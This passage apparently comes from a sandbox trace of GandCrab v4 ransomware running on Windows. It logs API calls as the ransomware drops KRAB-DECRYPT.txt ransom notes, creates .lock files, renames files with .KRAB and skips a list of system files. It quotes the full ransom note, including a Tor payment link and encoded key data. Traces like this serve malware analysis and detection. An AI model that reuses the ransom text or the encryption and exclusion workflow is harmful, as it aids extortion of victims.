KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0101.134] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0101.135] CloseHandle (hObject=0x434) returned 1 [0101.135] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.136] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.136] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0x155)) [0101.136] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.136] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0101.136] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0101.137] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Documents\\My Videos\\d2ca4a08d2ca4dee3d.lock") returned 59 [0101.137] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Videos\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\public\\documents\\my videos\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0101.137] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.138] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.138] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Videos\\") returned 36 [0101.138] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Videos\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\*") returned="C:\\Users\\Public\\Documents\\My Videos\\*" [0101.138] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xffffffff [0101.138] CloseHandle (hObject=0x434) returned 1 [0101.138] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0101.138] FindClose (in: hFindFile=0xfbdae0 | out: hFindFile=0xfbdae0) returned 1 [0101.138] CloseHandle (hObject=0x320) returned 1 [0101.138] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0101.138] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0101.138] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0101.138] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Downloads" | out: lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0101.138] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Downloads\\") returned="C:\\Users\\Public\\Downloads\\" [0101.138] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0101.139] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0101.139] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0101.139] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0101.139] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0101.139] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.139] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.139] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Downloads\\\\KRAB-DECRYPT.txt") returned 43 [0101.140] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\public\\downloads\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0101.140] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0101.140] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0101.143] CloseHandle (hObject=0x320) returned 1 [0101.143] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.144] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.144] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0x155)) [0101.144] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.144] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0101.144] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0101.145] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Downloads\\d2ca4a08d2ca4dee3d.lock") returned 49 [0101.145] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\public\\downloads\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0101.148] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.148] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.148] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\") returned 26 [0101.148] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Downloads\\*") returned="C:\\Users\\Public\\Downloads\\*" [0101.148] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbe0a0 [0101.148] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0101.149] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.149] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0101.149] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0101.149] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.149] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0101.149] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0101.149] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Public\\Downloads\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Public\\Downloads\\d2ca4a08d2ca4dee3d.lock" [0101.149] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.149] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Downloads\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 54 [0101.149] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\d2ca4a08d2ca4dee3d.lock") returned 49 [0101.149] lstrlenW (lpString=".lock") returned 5 [0101.149] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.149] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0101.150] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.151] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.151] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.151] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0101.151] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0101.151] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Downloads\\desktop.ini") returned="C:\\Users\\Public\\Downloads\\desktop.ini" [0101.151] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.151] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Downloads\\desktop.ini.KRAB") returned 42 [0101.151] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\desktop.ini") returned 37 [0101.151] lstrlenW (lpString=".ini") returned 4 [0101.152] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.152] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0101.152] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.152] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\desktop.ini") returned 37 [0101.152] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\desktop.ini") returned 37 [0101.152] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0101.152] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.152] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.152] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0101.152] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0101.153] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Public\\Downloads\\KRAB-DECRYPT.txt") returned="C:\\Users\\Public\\Downloads\\KRAB-DECRYPT.txt" [0101.153] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.153] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Downloads\\KRAB-DECRYPT.txt.KRAB") returned 47 [0101.153] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\KRAB-DECRYPT.txt") returned 42 [0101.153] lstrlenW (lpString=".txt") returned 4 [0101.153] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.153] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0101.153] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.154] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\KRAB-DECRYPT.txt") returned 42 [0101.154] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\KRAB-DECRYPT.txt") returned 42 [0101.154] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0101.154] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0101.154] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0101.154] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0101.154] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0101.154] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0101.154] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0101.154] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0101.154] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0101.154] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0101.154] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.154] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0101.154] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0101.155] CloseHandle (hObject=0x320) returned 1 [0101.155] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0101.155] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0101.155] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0101.155] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Public\\KRAB-DECRYPT.txt") returned="C:\\Users\\Public\\KRAB-DECRYPT.txt" [0101.155] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.155] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\KRAB-DECRYPT.txt.KRAB") returned 37 [0101.155] lstrlenW (lpString="C:\\Users\\Public\\KRAB-DECRYPT.txt") returned 32 [0101.155] lstrlenW (lpString=".txt") returned 4 [0101.155] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.156] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0101.156] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.157] lstrlenW (lpString="C:\\Users\\Public\\KRAB-DECRYPT.txt") returned 32 [0101.157] lstrlenW (lpString="C:\\Users\\Public\\KRAB-DECRYPT.txt") returned 32 [0101.157] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0101.157] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0101.157] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0101.157] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0101.157] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0101.157] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0101.157] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0101.157] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0101.157] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0101.157] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0101.157] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.157] 